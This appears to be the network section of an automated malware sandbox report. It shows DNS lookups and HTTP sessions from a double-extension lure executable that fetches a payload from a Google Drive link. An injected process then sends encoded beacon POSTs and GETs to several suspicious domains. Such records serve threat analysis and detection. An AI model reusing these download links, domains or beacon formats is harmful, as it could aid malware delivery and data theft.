                                                                                                  Dec 30, 2024 10:58:57.038443089 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038454056 CET8049993108.179.193.23192.168.2.6
                                                                                                  Dec 30, 2024 10:58:57.038535118 CET4999380192.168.2.6108.179.193.23
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 10:57:02.944675922 CET | 192.168.2.6 | 1.1.1.1 | 0x20f6 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:04.313318014 CET | 192.168.2.6 | 1.1.1.1 | 0xfc8d | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:12.894064903 CET | 192.168.2.6 | 1.1.1.1 | 0x4af | Standard query (0) | www.bellhomehd.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:17.915021896 CET | 192.168.2.6 | 1.1.1.1 | 0x80ba | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:18.911288023 CET | 192.168.2.6 | 1.1.1.1 | 0x80ba | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:19.927016973 CET | 192.168.2.6 | 1.1.1.1 | 0x80ba | Standard query (0) | www.einpisalpace.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:26.913516045 CET | 192.168.2.6 | 1.1.1.1 | 0x349a | Standard query (0) | www.marposet.shop | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:42.586324930 CET | 192.168.2.6 | 1.1.1.1 | 0x7337 | Standard query (0) | www.techforcreators.live | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:55.993215084 CET | 192.168.2.6 | 1.1.1.1 | 0x110a | Standard query (0) | www.missvet.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 10:57:02.951492071 CET | 1.1.1.1 | 192.168.2.6 | 0x20f6 | No error (0) | drive.google.com | | 142.250.186.174 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:57:04.320293903 CET | 1.1.1.1 | 192.168.2.6 | 0xfc8d | No error (0) | drive.usercontent.google.com | | 172.217.16.193 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:12.902815104 CET | 1.1.1.1 | 192.168.2.6 | 0x4af | Name error (3) | www.bellhomehd.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:21.875613928 CET | 1.1.1.1 | 192.168.2.6 | 0x80ba | Server failure (2) | www.einpisalpace.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:21.875626087 CET | 1.1.1.1 | 192.168.2.6 | 0x80ba | Server failure (2) | www.einpisalpace.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:21.875711918 CET | 1.1.1.1 | 192.168.2.6 | 0x80ba | Server failure (2) | www.einpisalpace.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:26.925690889 CET | 1.1.1.1 | 192.168.2.6 | 0x349a | No error (0) | www.marposet.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:26.925690889 CET | 1.1.1.1 | 192.168.2.6 | 0x349a | No error (0) | www.marposet.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:42.901125908 CET | 1.1.1.1 | 192.168.2.6 | 0x7337 | No error (0) | www.techforcreators.live | | 52.223.13.41 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 10:58:56.327861071 CET | 1.1.1.1 | 192.168.2.6 | 0x110a | No error (0) | www.missvet.net | missvet.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 10:58:56.327861071 CET | 1.1.1.1 | 192.168.2.6 | 0x110a | No error (0) | missvet.net | | 108.179.193.23 | A (IP address) | IN (0x0001) | false
                                                                                                  • drive.google.com
                                                                                                  • drive.usercontent.google.com
                                                                                                  • www.marposet.shop
                                                                                                  • www.techforcreators.live
                                                                                                  • www.missvet.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49987 | 188.114.97.3 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:58:26.952094078 CET | 509 | OUT | GET /i28d/?yt=LNd8mbFxBhGLQV&TB1lE=HRfyw8S2LmkNqQTdj7e+XySdNCmnttnomENxnEdal27Zyt9OvbxgyEIUd+T7UYt3ulEBayBzfHST035Fo0DtVgaGE1Ztsznh/Pj+8/p9meyljlzEGEhG/wkxevrzOSgU56GIkV0= HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.marposet.shop
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 30, 2024 10:58:27.534137011 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:27 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Last-Modified: Sat, 07 Dec 2024 23:09:32 GMT
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rESKkjTNQhj7%2Ftb0d736ct3OjvnL7sCtf04bhnodmVQ6CN5pkciIfU2IHP0TC3hoxkjWeixjTZ2p5RlzrPGN7De9xHJPLa7%2BxasT%2FrVceo6DGvOPeH5E%2BDMWlwAFubmT2PVV6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fa12be4cd434321-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1559&min_rtt=1559&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Ascii: 586<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css
Dec 30, 2024 10:58:27.534163952 CET | 224 | IN
                                                                                                  Data Ascii: "> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-we
Dec 30, 2024 10:58:27.534174919 CET | 811 | IN
                                                                                                  Data Ascii: ight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49988 | 52.223.13.41 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:58:42.920346975 CET | 782 | OUT | POST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
                                                                                                  Content-Length: 210
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Ascii: TB1lE=7gH22CpCKk0GKK11U159FuWf4fIFfLIuUZM54/w8glQ0COIdx4jg9UmVHTYe9P5fINREXYc/N4qllgVFHg5OwoTwQakGUUeHJJjUCeacZ35G9PBYoPbfx9NywWilnsD0u9czUWF0sra6eseiB4M4VT/3HdahHenRSzcJEZIbTDjKNN2kN9KqSi+l+jdKpcvg8tE2dgoIOmje
Dec 30, 2024 10:58:43.355765104 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.6 | 49989 | 52.223.13.41 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:58:45.465023994 CET | 806 | OUT | POST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
                                                                                                  Content-Length: 234
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Ascii: TB1lE=7gH22CpCKk0GLqF1WWh9NuWc2/IFWrIqUYw546QSgXk0brsd/cPg+UmVMzYfzv5uINd2Xdk/N4OllgFFHTRNy4Tub6kAQUeHJJjUCefUZ2dG8/xYuqncw9N1hWilxsDwu9cVUXJNspy6eoOiApMnMj/5DdbgXfHadi8MdLEfJkjrFbr+ROKJAyen+hF4p8vK+t82P3kvBSG9vOoVhXHjZdLvHYj5xIOxgQ==
Dec 30, 2024 10:58:45.893651962 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.6 | 49990 | 52.223.13.41 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:58:48.012761116 CET | 1819 | OUT | POST /6rby/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.techforcreators.live
                                                                                                  Origin: http://www.techforcreators.live
                                                                                                  Content-Length: 1246
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.techforcreators.live/6rby/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: TB1lE= [TRUNCATED]
Dec 30, 2024 10:58:48.451124907 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                  content-length: 0
                                                                                                  connection: close


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  4 | 192.168.2.6 | 49991 | 52.223.13.41 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Dec 30, 2024 10:58:50.554193974 CET | 516 | OUT | GET /6rby/?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.techforcreators.live
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Dec 30, 2024 10:58:50.985822916 CET | 396 | IN | HTTP/1.1 200 OK
                                                                                                  content-type: text/html
                                                                                                  date: Mon, 30 Dec 2024 09:58:50 GMT
                                                                                                  content-length: 275
                                                                                                  connection: close
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?TB1lE=2ivW13goMDZZIIgxIXx+PtmXwvlQP7M8TrIp9IEQgHwuZNQL7M/h+QGYEWAJ9fx4B+FPevpSLI/kijRzPjJx+Yn6WZwPBUitPI+kHM7nbQtU8vpWrajM5+kH6naS6tDsldE5bxs=&yt=LNd8mbFxBhGLQV"}</script></head></html>


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  5 | 192.168.2.6 | 49993 | 108.179.193.23 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Dec 30, 2024 10:58:56.347444057 CET | 755 | OUT | POST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 210
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.missvet.net/htux/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Ascii: TB1lE=d7uwiBhv79vse84Dz9dmJ9Qoew8PI9EiF7CN0u963CtiIYmLF6i8jnAcU3sXhFC1JRGvU1kTq3K8PbumqJggHwYXXGoXjR0wv2mFhEGcBvItJSk5ZgyVH/NkBYwvvnMlfc9IISpj9OcyyCjZYx7DKPVq3sZQ5x/xEPpja0yJ/CJrTycjPpCu9+br3aYcCa2X0qDQMNnAbb1C
                                                                                                  Dec 30, 2024 10:58:57.038362026 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:56 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Link: <https://missvet.net/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: Accept-Encoding
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade
                                                                                                  Content-Encoding: gzip
                                                                                                  X-Endurance-Cache-Level: 0
                                                                                                  X-nginx-cache: WordPress
                                                                                                  Content-Length: 5814
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  6 | 192.168.2.6 | 49994 | 108.179.193.23 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Dec 30, 2024 10:58:58.887347937 CET | 779 | OUT | POST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 234
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.missvet.net/htux/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Ascii: TB1lE=d7uwiBhv79vsccIDxf1mIdQrRQ8PTtEmF7ON0sQl2wJiI5WLE4a8uHAcaXtdvlC+JRK4U0YTq3e8Paemq6IjFgYZYmoV+B0wv2mFhEi2BvQtJgw5bFSWKfNrGYwv43Nsfc8dIXJJ9IYyyGnZZg7MAPUh5MYX0TaTF/8hWU6osRxTbkB5TaCNvu7p3YAuC6292q7QearnUvQh38l26b1h0hIrBl+GIMGNeA==
                                                                                                  Dec 30, 2024 10:58:59.564294100 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:58:59 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Link: <https://missvet.net/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: Accept-Encoding
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade
                                                                                                  Content-Encoding: gzip
                                                                                                  X-Endurance-Cache-Level: 0
                                                                                                  X-nginx-cache: WordPress
                                                                                                  Content-Length: 5814
                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                  7 | 192.168.2.6 | 49995 | 108.179.193.23 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                  Dec 30, 2024 10:59:01.435453892 CET | 1792 | OUT | POST /htux/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  Host: www.missvet.net
                                                                                                  Origin: http://www.missvet.net
                                                                                                  Content-Length: 1246
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Cache-Control: no-cache
                                                                                                  Referer: http://www.missvet.net/htux/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                                  Data Ascii: TB1lE=d7uwiBhv79vsccIDxf1mIdQrRQ8PTtEmF7ON0sQl2wBiIvqLEZa8vHAcS3tevlCvJRDQU0Vxq1m8doWmirIjMgYZdWoQjR0lv2XMhES2BvQtJgc5NAyWZvNkBYwdvnNEfYQNIXFz+44yym3ZaWHMIPUj6MY10TmlF+QbWXmSsStTYFoAO5m1zOj0rYMVPKzIpav3fbj0TNMu6bp64KMw/SMYIS/zdIvpCOdRm7u4lbIl3UpCmrUnWP7sWkj2pQnMcNOiLwyw320gALsGrOJEZ6/yDMyyhxe3z+XJg7xFgJZAY1WEQwJHnMP37p+K5L1DkUfA0/1i+3/NIszrPYAWC26fDXXiG/vYwQOZgIwP2USMYwohKXAYWA3ZlKOyRkTpVgWX5vnPvUmUYrOXjwk2dArQ4MgpepKRXA2P/iVT97Pfj/Jsj0WCEJ1HldjtVEckUyxQPh/GBsABqorGPd/a784y49BlDJG2Msxx5nK83I1eFtlB6yrKbRK3bw5oBXOqn0IHkETOPWErFaVNjjyJtvXMmWJKhQ2JdjUV7TsQWq0iHY9aYKoPZ41h8sXp19YcYwl+Ne8bSfeie2lDM9tw85p07RSi6DEZAjb6uecASpL++VFdPg1xmJE07w/bnYUByLU4rPEOdfspMnl7anWnED79cQoVUVZeaUVHxiI/QNsZalgU7/bD6Ni2O0eTQeGYWlZ3MsMgQ8MH2UxocvWyzfNIJOZKO0U6V+oLOh72DyAPMB/QN/6ebo4JCdLP6fhcPw09uZCfGwmUSlkpjeEoR32a16mcSGPJ/1udWisEKXdTvHfNVQQpWmOuGdsk0bW1IMTpDfGTld0CdEbcslXecY85wQF8ldLiQ5gUGUqt8MWvTy8+xlajUZnIJhcM90uS+pvIdptx2DGJ+/4qJjbwjagBJ/jzXVoLE1DgxHt22g3eJcPm+O4s1gypZhVu+to7T3mF9x7AeuO8ndi2T3B6quVqpyvmjU0lJQ8FG//FA1da2W [TRUNCATED]
                                                                                                  Dec 30, 2024 10:59:02.166239023 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Mon, 30 Dec 2024 09:59:01 GMT
                                                                                                  Server: Apache
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  Link: <https://missvet.net/wp-json/>; rel="https://api.w.org/"
                                                                                                  Vary: Accept-Encoding
                                                                                                  Upgrade: h2,h2c
                                                                                                  Connection: Upgrade
                                                                                                  Content-Encoding: gzip
                                                                                                  X-Endurance-Cache-Level: 0
                                                                                                  X-nginx-cache: WordPress
                                                                                                  Content-Length: 5814
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Dec 30, 2024 10:59:02.166289091 CET1236INData Raw: 2d 0a 5c 20 1a 8c 9d 52 c5 cf e6 79 86 47 4c 67 78 f6 fa cd 8f b7 11 60 ab 2c 22 af 48 8b e7 38 69 68 f6 f6 4e 73 d0 94 70 9a e3 78 02 1c f0 42 42 e2 d6 70 93 c0 35 b2 67 90 e3 8b 90 a4 e7 85 03 6f 78 42 a6 40 75 29 41 8d 08 7c 34 0b ff c8 b0 f9
                                                                                                  Data Ascii: -\ RyGLgx`,"H8ihNspxBBp5goxB@u)A|4HBch1*z^p_3LBM1Q'Dx<RQl*b$8$"j.p: vHjn:{'`d8>*suk,~g8F"jyL0LhtH
                                                                                                  Dec 30, 2024 10:59:02.166292906 CET137INData Raw: 4a 5d 80 f6 38 68 7f 56 b8 51 7d 2d 5f a7 78 11 e5 a7 90 65 c2 dd dc 0a d3 04 5a f9 9f 56 27 53 59 f5 c7 5e ce b8 f7 49 3d 47 05 e3 9e d7 f5 ba 16 61 31 72 54 4d 15 d6 ba d5 fd a4 ac b3 8d ac 2f d0 54 64 25 46 08 a9 69 51 2c 36 a2 5c f4 07 d7 d4
                                                                                                  Data Ascii: J]8hVQ}-_xeZV'SY^I=Ga1rTM/Td%FiQ,6\sWLpWOBDR-mbK?&eL


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49996 | 108.179.193.23 | 80 | 4608 | C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 10:59:03.976330996 CET | 507 | OUT | GET /htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30= HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.missvet.net
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; SM-A700FD Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Dec 30, 2024 10:59:04.588622093 CET | 654 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 30 Dec 2024 09:59:04 GMT
Server: nginx/1.23.4
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Redirect-By: WordPress
Location: http://missvet.net/htux/?yt=LNd8mbFxBhGLQV&TB1lE=Q5GQh2pDxKbycOBSxf5jPMYccS9RI9gVCLS1zMNZ/AR9Q5msL9GnpCYVVBAJgHuDCTCUS1tunX2/M4ihm7EfJFMVRSEfiRcDq1K8lUuiYdkyOhgpRhKJF9gKDaUZ1llgaIE/O30=
Vary: Accept-Encoding
X-Endurance-Cache-Level: 0
X-nginx-cache: WordPress
X-Server-Cache: true
X-Proxy-Cache: MISS


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49710 | 142.250.186.174 | 443 | 5016 | C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:57:03 UTC | 205 | OUT | GET /uc?export=download&id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.google.com
2024-12-30 09:57:04 UTC | 1319 | IN | HTTP/1.1 303 See Other
Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 30 Dec 2024 09:57:04 GMT
Location: https://drive.usercontent.google.com/download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Content-Security-Policy: script-src 'report-sample' 'nonce-9fqY4aBNGSE1Lzyphbnm2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.6 | 49711 | 172.217.16.193 | 443 | 5016 | C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 09:57:04 UTC | 223 | OUT | GET /download?id=1DIFF5eqwVA8IoDMW5L-uJvPMuo0Aiqk1&export=download HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: drive.usercontent.google.com
2024-12-30 09:57:07 UTC | 4939 | IN | HTTP/1.1 200 OK
